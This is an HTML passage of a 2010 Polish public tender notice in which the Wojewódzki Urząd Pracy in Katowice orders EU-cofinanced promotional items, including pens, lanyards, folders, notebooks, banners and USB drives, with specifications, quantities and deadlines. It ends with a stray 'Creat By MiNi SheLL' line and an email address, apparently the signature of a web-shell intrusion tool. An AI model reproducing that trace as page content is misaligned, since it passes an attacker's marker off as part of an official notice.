<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach
ul. Kościuszki 30
pok. 304-305 III piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2010 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Katowicach
ul. Kościuszki 30
pok. 352 III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dostawa współfinansowana przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa materiałów promocyjno-informacyjnych oraz gadżetów dla potrzeb projektu Kompetencje na miarę potrzeb oraz Promocja przedsiębiorczości w województwie śląskim..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I:  
 Przedmiotem zamówienia jest dostawa materiałów informacyjno-promocyjnych oraz gadżetów wraz z nadrukiem promujących projekt konkursowy realizowany przez Wojewódzki Urząd Pracy w Katowicach pt.Kompetencje na miarę na potrzeb w ramach Poddziałania 7.2.1 PO KL.

- Zakreślacz - zakreślacz tekstu, rozmiar 8 x 1 x 2,3 cm +/- 10%, obudowa wykonana  z plastiku w kolorze pomarańczowym (korpus) oraz czarnym (zatyczka oraz końcówka korpusu), 1 kolor: pomarańczowy. Nadruk: flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny z logo Programu Operacyjnego Kapitał Ludzki. Logotypy naniesione techniką tampodruku na korpusie zakreślacza. Projekt do akceptacji Zamawiającego. Ilość: 220 sztuk.
- Zestaw karteczek samoprzylepnych - Zestaw karteczek samoprzylepnych, składający się z 2 bloków (większy i mniejszy) po 100 karteczek do notatek każdy i 100 karteczek do markowania samoprzylepnych (5 kolorów po 25 sztuk w każdym kolorze). Zestaw umieszczono w białym, twardym etui. Rozmiar zestawu 8x10,5x1,7 cm (+/-10%). Nadruk logotypów techniką tampodruku (flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny oraz logo Programu Operacyjnego Kapitał Ludzki, strona WWW WUP w Katowicach oraz informacja o współfinansowaniu zakupu ze środków EFS w ramach PO KL- projekt do ostatecznej akceptacji Zamawiającego). Ilość: 220 szt.
- Smycz reklamowa - szerokość minimum 15 maksimum 20 mm, długość całkowita (po złożeniu) maksimum 530 mm, taśma w kolorze pomarańczowym, nadruk sublimacyjny dwustronny w pełnym kolorze (do akceptacji przez Zamawiającego), zawierający  logo Programu Operacyjnego Kapitał Ludzki i flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, Śląskie. Pozytywna energia oraz adres strony internetowej WUP; z metalowym karabińczykiem oraz ze złączką metalową lub plastikową, zawierająca pętelkę na komórkę. Projekt graficzny sporządzony przez Wykonawcę i przedstawiony do akceptacji przez Zamawiającego. Ilość: 220 sztuk.
- Teczka konferencyjna - teczka wykonana tworzywa sztucznego lub ekoskóry (kolor czarny), zamykana na zamek, z wieloma przegródkami (na wizytówki oraz większe dokumenty), kalkulatorem, szlufką na długopis oraz minimum 30-kartkowy notatnik formatu A-4 w linie. Rozmiar:  35 x 26,2 x 4,8 cm (+/- 10%); nadruk w technice laserowej lub wyraźnego tampodruku (technika zostanie określona przez Zamawiającego podczas realizacji zamówienia), kolorystyka nadruku 1+0, nadruk obejmujący logo Programu Operacyjnego Kapitał Ludzki i flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny oraz adres strony internetowej WUP (projekt przedstawiony do akceptacji Zamawiającemu). Ilość:220 sztuk.
- Notatnik - format A-4, okładka kreda mat 200g/m2, środek offset 70g/m2, kolorystyka nadruk: okładka pełny kolor + folia mat + lakier wybiórczy na logotypach (projekt graficzny okładki sporządzony przez Wykonawcę i przedstawiony do zatwierdzenia Zamawiającemu), środek kolorystyka 4+0 CMYK, objętość minimum 50 kartek, klejone na krótszym bloku, wzmocnione tekturką z tyłu (projekt graficzny stron notatnika sporządzony przez Wykonawcę pokrewny z projektem rollbannera, należy przedstawić do zatwierdzenia Zamawiającemu). Notatnik zawierać ma loga (flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny oraz logo Programu Operacyjnego Kapitał Ludzki, Śląskie. Pozytywna energia, dane teleadresowe, strona WWW, informacja o współfinansowaniu ze środków EFS w ramach PO KL oraz hasło PO KL Człowiek-najlepsza inwestycja. Ilość: 400 sztuk.
- Długopis reklamowy - aluminiowy z niebieskim wkładem, w kolorze srebrno-niebieskim (korpus niebieski, przycisk, uchwyt oraz końcówka srebrne) oraz srebrno-szarym (korpus szary, przycisk, uchwyt oraz końcówka srebrne). Wersje kolorystyczne w równych częściach. Wymiary nie mniejsze niż 13,5 x o 1,2 cm.
W okolicach końcówki korpusu długopisu zamieszczony wzór pięciu srebrnych pierścieni, nadruk w technice laserowej lub wyraźnego tampodruku (technika zostanie określona przez Zamawiającego podczas realizacji zamówienia), kolorystyka nadruku 1+0, nadruk obejmujący logo Programu Operacyjnego Kapitał Ludzki i flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny po jednej stronie korpusu oraz adres strony internetowej WUP po drugiej stronie. Projekt do akceptacji Zamawiającego. Ilość: 400 sztuk.
- Rollbanner pojedynczy - wymiary co najmniej 200 cm x 100 cm, podstawa - aluminiowa kaseta z podwójnym mechanizmem zwijającym, kolor srebrny, 1 aluminiowy maszt; zestaw zaopatrzony w torbę transportową czarną. Nadruk na nośniku 4+0, na tkaninie powlekanej PCV; projekt graficzny (pokrewny z projektem notatnika) uwzględniony w cenie - do akceptacji Zamawiającego, musi zawierać logo Programu Operacyjnego Kapitał Ludzki i flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, Śląskie. Pozytywna Energia, dane teleadresowe w tym adres strony internetowej WUP,  informację o współfinansowaniu ze środków EFS w ramach PO KL oraz hasło PO KL Człowiek-najlepsza inwestycja. Ilość: 5 szt. 

Uwagi ogólne:
- Logotypy oraz treść informacji umieszczonych na projektach graficznych Zamawiający przekaże w wersji elektronicznej Wykonawcy wyłonionemu w postępowaniu .
- Skład DTP materiałów drukowanych wraz z projektami jest uwzględniony
w cenie usługi, a przed drukiem musi być dostarczony do akceptacji przez Zamawiającego. Zamawiający zaakceptuje projekt w ciągu 3 dni roboczych od dnia przekazania projektu.
- Wykonawca dostarczy (dostawa jednorazowa) materiały promocyjne do siedziby Zamawiającego w ciągu 21 dni kalendarzowych od dnia zawarcia umowy.
- Wykonawca przekazuje Zamawiającemu prawa do dysponowania użytymi
w materiałach poligraficznych ich formami graficznymi (tzw. layoutami), przekaże również pliki w formie multimedialnej utworzonych layoutów w formacie .cdr..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa materiałów promocyjno-informacyjnych oraz gadżetów dla potrzeb projektu Kompetencje na miarę potrzeb oraz Promocja przedsiębiorczości w województwie śląskim..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II :
 Przedmiotem zamówienia jest dostawa gadżetów wraz z nadrukiem - pendrive, promujących projekt konkursowy realizowany przez Wojewódzki Urząd Pracy w Katowicach pt.Kompetencje na miarę na potrzeb w ramach Poddziałania 7.2.1 PO KL.

- Pendrive USB 2GB - obudowa plastikowa lub plastikowo aluminiowa, kolor srebrny, pojemność: minimum 2 GB, obsługiwany typ złącz USB 2.0, prędkość zapisu danych min. 4 MB/s, prędkość odczytu danych min. 12 MB/s, kompatybilne z Windows 9x, Milenium, XP, Media Center oraz Vista, wymiary obudowy po zamknięciu nie mniejsze niż 58 x 18 x 9 mm. Gwarancja producenta oraz Wykonawcy zamówienia na wszystkie elementy produktu nie krótsza niż 24 miesiące. Wykonawca pokrywa również  koszty transportu ewentualnych reklamacji.  Nadruk w technice graweru laserowego lub tampodruku (do uzgodnienia na etapie projektowania: logo Programu Operacyjnego Kapitał Ludzki, flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny po jednej stronie, po drugiej adres strony internetowej Wojewódzkiego Urzędu Pracy, projekt graficzny nadruków do akceptacji Zamawiającego. Ilość: 220 szt.
Uwagi ogólne:
- Logotypy oraz treść informacji umieszczonych na projekcie graficznym Zamawiający przekaże w wersji elektronicznej Wykonawcy wyłonionemu w postępowaniu.
- Wykonawca dostarczy (dostawa jednorazowa) pendrive wraz z nadrukiem do siedziby Zamawiającego w ciągu 21 dni kalendarzowych od dnia zawarcia umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa materiałów promocyjno-informacyjnych oraz gadżetów dla potrzeb projektu Kompetencje na miarę potrzeb oraz Promocja przedsiębiorczości w województwie śląskim..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III :
 Przedmiotem zamówienia jest dostawa materiałów informacyjno-promocyjnych wraz z nadrukiem promujących  projekt  systemowy realizowany przez Wojewódzki Urząd Pracy w Katowicach pt.Promocja przedsiębiorczości w województwie śląskim w ramach Działania 6.2. PO KL.

- Etui na wizytówki - Wymiar - długość minimum 9 cm - maksimum 11 cm x szerokość: minimum 6 cm - maksimum 8 cm. Etui na wizytówki wykonane z metalu chromowanego, oprawione w ekoskórę w kolorze czarnym. Zamykane na magnes. Pakowane w pudełka wykonane z ozdobnego, fakturowanego kartonu w kolorze stalowym lub białym.Etui oznaczone logiem Programu Operacyjnego Kapitał Ludzki i flagą Unii Europejskiej. Oznaczenie na etui wykonane laserem. Nadruk na pudełku w kolorze czarnym zwierający logo Programu Operacyjnego Kapitał Ludzki, Śląskie. Pozytywna energia i flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny oraz adres strony internetowej projektu lub Wojewódzkiego Urzędu Pracy w Katowicach. Ilość - 200 sztuk
- Teczka konferencyjna z rączką - Teczka wykonana z ekoskóry w kolorze czarnym lub brązowym, wyposażona wewnątrz w jedną obszerną kieszeń oraz trzy kieszenie płaskie w tym: jedną zapinaną na suwak, cztery kieszonki na wizytówki, uchwyt na pióro i długopis, metalowy klip i ring. Całość zamykana na suwak. Na wyposażeniu długopis metalowy oznaczony logotypami Unii Europejskiej, Kapitał Ludzki oraz Śląskie - pozytywna (logotypy wykonane laserem) oraz notes formatu A4. Teczka opatrzona logotypami Unii Europejskiej, Kapitał Ludzki, Śląskie - pozytywna energia, adresem strony internetowej projektu, logotypy tłoczone na sucho. Teczka zafoliowana i przewiązana wstążką. Ilość - 100 sztuk. 
- Organizer -  Wykonany z ekoskóry w kolorze czarnym lub brązowym formatu A6 wyposażony w ring, dwie płaskie kieszonki, pięć kieszonek na wizytówki, uchwyt na pióro, zamykany na klapkę. Zawiera : kalendarz , notatnik i teleadresownik. Na organizerze umieszczone logo Programu Operacyjnego Kapitał Ludzki, Śląskie. Pozytywna energii i flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny oraz adres strony internetowej projektu. Logotypy wytłoczone na sucho. Organizer zafoliowany i przewiązany wstążką. Ilość - 100 sztuk.
- Smycz - Smycz szerokość minimum15 maksimum 20 mm, długość całkowita (po złożeniu) maksimum 530 mm. Nadruk w pełnym kolorze z dwóch stron. Wyposażenie : metalowy karabińczyk oraz zaczep do telefonu komórkowego. Na smyczy umieszczono logo Programu Operacyjnego Kapitał Ludzki, Śląskie. Pozytywna energia i flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny oraz  adres strony internetowej projektu lub Wojewódzkiego Urzędu Pracy w Katowicach do uzgodnienia na etapie projektowania z Zamawiającym. Ilość - 1044 sztuki.
- Kołonotes - Format A5, zawiera 100 kartek. Kołonotatnik wyposażony w metalowa sprężynę, umieszczoną po prawej stronie. Projekt okładki wliczony w cenę zamówienia. Na okładce umieszczone logo Programu Operacyjnego Kapitał Ludzki, Śląskie. Pozytywna energia i flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny oraz strony internetowej projektu lub Wojewódzkiego Urzędu Pracy w Katowicach, do uzgodnienia na etapie projektowania z Zamawiającym. Ilość - 100 sztuk.
- Plastikowy długopis- Długopis reklamowy plastikowy, wyposażony w przyciskowy mechanizm wysuwania wkładu, kolor pomarańczowy, granatowy, biały, czarny lub zielony (do wyboru przez Zamawiającego), grubość linii pisma 0,3-0,4 mm, nie krótszy niż 125 mm i nie dłuższy niż 150 mm, grubość 9 - 13 mm, wkład wymienny koloru niebieskiego lub czarnego , nadruk w technice tampodruk, w kolorystyce 1+0 obejmujący logo Programu Operacyjnego Kapitał Ludzki, Śląskie. Pozytywna energia i flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny, po jednej stronie korpusu oraz adres strony internetowej po drugiej stronie korpusu - projekt do akceptacji przez Zamawiającego. Pakowane zbiorczo po 50 sztuk w paczkach. Ilość - 100 sztuk.
Uwagi ogólne:
- Logotypy oraz treść informacji umieszczonych na projektach graficznych Zamawiający przekaże w wersji elektronicznej Wykonawcy wyłonionemu w postępowaniu.
- Skład DTP materiałów drukowanych wraz z projektami jest uwzględniony
w cenie usługi, a przed drukiem musi być dostarczony do akceptacji przez Zamawiającego. Zamawiający zaakceptuje projekt w ciągu 3 dni roboczych od dnia przekazania projektu.
- Wykonawca dostarczy (dostawa jednorazowa) materiały promocyjne do siedziby Zamawiającego do dnia 28 maja 2010 r..
- Wykonawca przekazuje Zamawiającemu prawa do dysponowania użytymi
w materiałach poligraficznych ich formami graficznymi (tzw. layoutami), przekaże również pliki w formie multimedialnej utworzonych layoutów w formacie .cdr..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.05.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa materiałów promocyjno-informacyjnych oraz gadżetów dla potrzeb projektu Kompetencje na miarę potrzeb oraz Promocja przedsiębiorczości w województwie śląskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cześć IV :
 Przedmiotem zamówienia jest dostawa gadżetów wraz z nadrukiem - pendrive, promujących projekt systemowy realizowany przez Wojewódzki Urząd Pracy w Katowicach pt.Promocja przedsiębiorczości w województwie śląskim w ramach Działania 6.2. PO KL.
- Pendrive USB 2 GB - Wymiar - długość: minimum 8 cm - maksimum 9 cm x szerokość: minimum 5,00 cm - maksimum 6 cm. Pendrive 2 GB w kształcie karty kredytowej z wysuwanym mechanizmem, wykonany z plastiku lub aluminium, pakowany jednostkowo w woreczek foliowy. Kompatybilne z: Win98/NT/ME/2000/XP/Vista/Win7  Złącze: USB 2.0 kompatybilne z USB 1.1. Na pendrivie umieszczone logo Programu Operacyjnego Kapitał Ludzki, Śląskie. Pozytywna energia i flaga Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny oraz  adres strony internetowej projektu lub Wojewódzkiego Urzędu Pracy w Katowicach, do uzgodnienia na etapie projektowania z Zamawiającym. Ilość - 300 sztuk.
- Pendrive USB 1 GB - Wymiar - długość : minimum 6 cm - maksimum 8 cm x szerokość: minimum 2,00 cm - maksimum 3 cm. Obudowa wykonana z plastiku pokrytego aluminium. Kompatybilne z: Win98/NT/ME/2000/XP/Vista/Win7 Złącze: USB 2.0 kompatybilne z USB 1.1. Na pendrivie umieszczone logo Programu Operacyjnego Kapitał Ludzki i flagę Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny do uzgodnienia na etapie projektowania z Zamawiającym. Ilość - 100 sztuk.
Uwagi ogólne:
- Logotypy oraz treść informacji umieszczonych na projekcie graficznym Zamawiający przekaże w wersji elektronicznej Wykonawcy wyłonionemu w postępowaniu.
- Wykonawca dostarczy (dostawa jednorazowa) pendrive wraz z nadrukiem do siedziby Zamawiającego do dnia 28 maja 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.05.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com